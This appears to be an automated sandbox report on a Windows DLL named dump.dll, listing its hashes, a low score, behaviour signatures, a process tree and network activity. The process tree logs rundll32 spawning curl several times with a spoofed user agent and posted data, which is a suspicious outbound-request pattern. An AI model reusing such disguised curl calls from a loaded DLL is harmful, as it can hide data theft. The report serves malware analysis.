Analysis

  • max time kernel
    141s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/03/2023, 14:11 UTC

General

  • Target
    dump.dll
  • Size
    178KB
  • MD5
    529c65521e8a07c8810b6d225f7e2a89
  • SHA1
    d03ee28dc71232ba9895dd5f017ecfbd18a621ce
  • SHA256
    ba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f
  • SHA512
    15185e2b075c6dddc73441081405cfbd4c009ef229d037c5cf06792d5d1d8d802546aba0ce81345ed349d3b8a86393b1488420f364661de62b536aa56e68c74c
  • SSDEEP
    3072:7Qb8KGhaCX8bYS3oAlob7UgS0VRilFxfiHNSXMJiB5CnPBRalGsQjxncIpoa1cT9:fQp4lBZFoaZLU9o0GVmA+P

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\rundll32.exe (depth 1)
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\dump.dll,#1
    PID:232
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • C:\Windows\system32\curl.exe (depth 2, child of PID 232)
      curl -A cur1-agent -L -s -d dl
      PID:208
    • C:\Windows\system32\curl.exe (depth 2, child of PID 232)
      curl -A cur1-agent -L -s -d dl
      PID:2548
    • C:\Windows\system32\curl.exe (depth 2, child of PID 232)
      curl -A cur1-agent -L -s -d dl
      PID:852
    • C:\Windows\system32\curl.exe (depth 2, child of PID 232)
      curl -A cur1-agent -L -s -d dl
      PID:3764
    • C:\Windows\system32\curl.exe (depth 2, child of PID 232)
      curl -A cur1-agent -L -s -d dl
      PID:1052

            Network

  DNS lookups (all sent to 8.8.8.8:53, resolver geolocated US)

  • 228.249.119.40.in-addr.arpa IN PTR
    Response: none
  • 95.221.229.192.in-addr.arpa IN PTR
    Response: none
  • 154.25.221.88.in-addr.arpa IN PTR
    Response: 154.25.221.88.in-addr.arpa IN PTR a88-221-25-154deploystaticakamaitechnologiescom
  • 36.146.190.20.in-addr.arpa IN PTR
    Response: 36.146.190.20.in-addr.arpa IN CNAME 36.0-26.146.190.20.in-addr.arpa
  • 123.108.74.40.in-addr.arpa IN PTR
    Response: none
  • 164.2.77.40.in-addr.arpa IN PTR
    Response: none
  • 233.141.123.20.in-addr.arpa IN PTR
    Response: none
  • 2.36.159.162.in-addr.arpa IN PTR
    Response: none
  • 176.122.125.40.in-addr.arpa IN PTR
    Response: none
  • 216.74.101.95.in-addr.arpa IN PTR
    Response: 216.74.101.95.in-addr.arpa IN PTR a95-101-74-216deploystaticakamaitechnologiescom
  Connections (columns: remote address, domain, protocol, bytes sent, bytes received, packets sent, packets received; empty cells mean no value was recorded)

  • 13.69.239.74:443, -, -, 322 B, -, 7, -
  • 93.184.221.240:80, -, -, 322 B, -, 7, -
  • 93.184.221.240:80, -, -, 322 B, -, 7, -
  • 173.223.113.164:443, -, -, 322 B, -, 7, -
  • 131.253.33.203:80, -, -, 322 B, -, 7, -
  • 8.8.8.8:53, 228.249.119.40.in-addr.arpa, dns, 73 B, 159 B, 1, 1
    DNS Request: 228.249.119.40.in-addr.arpa
  • 8.8.8.8:53, 95.221.229.192.in-addr.arpa, dns, 73 B, 144 B, 1, 1
    DNS Request: 95.221.229.192.in-addr.arpa
  • 8.8.8.8:53, 154.25.221.88.in-addr.arpa, dns, 72 B, 137 B, 1, 1
    DNS Request: 154.25.221.88.in-addr.arpa
  • 8.8.8.8:53, 36.146.190.20.in-addr.arpa, dns, 72 B, 168 B, 1, 1
    DNS Request: 36.146.190.20.in-addr.arpa
  • 8.8.8.8:53, 123.108.74.40.in-addr.arpa, dns, 72 B, 146 B, 1, 1
    DNS Request: 123.108.74.40.in-addr.arpa
  • 8.8.8.8:53, 164.2.77.40.in-addr.arpa, dns, 70 B, 144 B, 1, 1
    DNS Request: 164.2.77.40.in-addr.arpa
  • 8.8.8.8:53, 233.141.123.20.in-addr.arpa, dns, 73 B, 159 B, 1, 1
    DNS Request: 233.141.123.20.in-addr.arpa
  • 8.8.8.8:53, 2.36.159.162.in-addr.arpa, dns, 71 B, 133 B, 1, 1
    DNS Request: 2.36.159.162.in-addr.arpa
  • 8.8.8.8:53, 176.122.125.40.in-addr.arpa, dns, 73 B, 159 B, 1, 1
    DNS Request: 176.122.125.40.in-addr.arpa
  • 8.8.8.8:53, 216.74.101.95.in-addr.arpa, dns, 72 B, 137 B, 1, 1
    DNS Request: 216.74.101.95.in-addr.arpa

            MITRE ATT&CK Matrix
